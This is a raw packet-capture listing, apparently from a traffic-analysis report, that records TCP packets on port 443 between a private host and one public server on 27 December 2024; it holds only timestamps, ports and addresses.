                                                                                            Dec 27, 2024 10:12:21.098387003 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.098419905 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.098433971 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.103914976 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.103935003 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.104007006 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.104024887 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.104063034 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.230161905 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.230179071 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.230251074 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.230259895 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.230299950 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.236109018 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.236124992 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.236172915 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.236227036 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.236237049 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.236439943 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.242031097 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.242047071 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.242113113 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.242120981 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.242158890 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.282355070 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.282372952 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.282444954 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.282458067 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.282495022 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.287662029 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.287682056 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.287744999 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.287755966 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.287798882 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.293616056 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.293633938 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.293698072 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.293711901 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.293750048 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.299566031 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.299581051 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.299674034 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.299685955 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.299737930 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.305236101 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.305250883 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.305304050 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.305313110 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.305356026 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.431606054 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.431622028 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.431679964 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.431689978 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.431708097 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.431730986 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.437616110 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.437630892 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.437684059 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.437691927 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.437716007 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.437736034 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.443516016 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.443531036 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.443578959 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.443584919 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.443614006 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.443628073 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.483943939 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.483962059 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.484072924 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.484090090 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.484134912 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.489824057 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.489841938 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.489924908 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.489933968 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.489978075 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.495839119 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.495856047 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.495929003 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.495939970 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.495985031 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.501108885 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.501127958 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.501199961 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.501210928 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.501250982 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.506680965 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.506695986 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.506778002 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.506788969 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.506829977 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.633049965 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.633068085 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.633138895 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.633147955 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.633192062 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.639074087 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.639089108 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.639157057 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.639168024 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.639206886 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.644951105 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.644967079 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.645041943 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.645060062 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.645095110 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.686012030 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.686031103 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.686121941 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.686140060 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.686184883 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.692015886 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.692047119 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.692111015 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.692123890 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.692173958 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.697283983 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.697304010 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.697375059 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.697386026 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.697427988 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.703187943 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.703203917 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.703279018 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.703289986 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.703336954 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.708880901 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.708899021 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.708967924 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.708980083 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.709019899 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.834436893 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.834460974 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.834531069 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.834539890 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.834582090 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.840450048 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.840471029 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.840562105 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.840572119 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.840627909 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.845581055 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.845629930 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.845650911 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.845660925 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.845694065 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.846337080 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.846380949 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.846388102 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.887291908 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.887325048 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.887356043 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.887368917 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.887399912 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.892455101 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.892469883 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.892513037 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.892520905 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.892530918 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.892558098 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.898438931 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.898452997 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.898520947 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.898530960 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.898559093 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.898581982 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.903739929 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.903757095 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.903825998 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.903835058 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.903872013 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.910067081 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.910082102 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.910134077 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.910140991 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:21.910166025 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:21.910185099 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.035643101 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.035672903 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.035718918 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.035728931 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.035759926 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.035778999 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.041616917 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.041637897 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.041699886 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.041708946 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.041752100 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.046916008 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.046943903 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.047012091 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.047022104 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.047048092 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.047061920 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.087835073 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.087857008 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.087920904 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.087946892 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.087977886 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.087994099 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.093965054 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.093988895 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.094041109 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.094057083 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.094104052 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.099761009 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.099781990 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.099854946 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.099868059 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.099911928 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.105140924 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.105161905 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.105211973 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.105220079 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.105261087 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.111363888 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.111385107 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.111434937 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.111444950 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.111481905 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.237180948 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.237204075 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.237243891 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.237252951 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.237288952 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.237299919 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.243050098 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.243072987 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.243109941 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.243118048 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.243148088 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.243168116 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.248359919 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.248388052 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.248442888 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.248454094 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.248481989 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.248513937 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.286442995 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.286510944 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.292434931 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.292459011 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.292507887 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.292521954 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.292552948 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.292572975 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.297799110 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.297821045 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.297864914 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.297874928 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.297902107 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.297920942 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.303709984 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.303731918 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.303790092 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.303803921 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.303854942 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.309627056 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.309649944 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.309709072 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.309720039 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.309748888 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.309765100 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.315191984 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.315213919 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.315253019 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.315260887 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.315294981 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.315308094 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.441169977 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.441193104 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.441296101 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.441313982 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.441354990 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.447159052 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.447181940 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.447232962 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.447241068 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.447285891 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.487924099 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.487946987 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.487996101 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.488007069 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.488034010 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.488059044 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.493746042 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.493766069 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.493829012 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.493837118 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.493880033 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.499113083 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.499134064 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.499180079 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.499200106 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.499216080 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.499241114 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.505023956 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.505045891 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.505098104 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.505106926 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.505146027 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.510960102 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.510982037 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.511039019 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.511049032 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.511092901 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.516623020 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.516644955 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.516700029 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.516715050 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.516757965 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.642678022 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.642709970 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.642802954 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.642812967 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.642862082 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.648649931 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.648680925 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.648725986 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.648732901 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.648772001 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.689075947 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.689099073 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:22.689181089 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:22.689189911 CET44349763104.21.74.235192.168.2.4
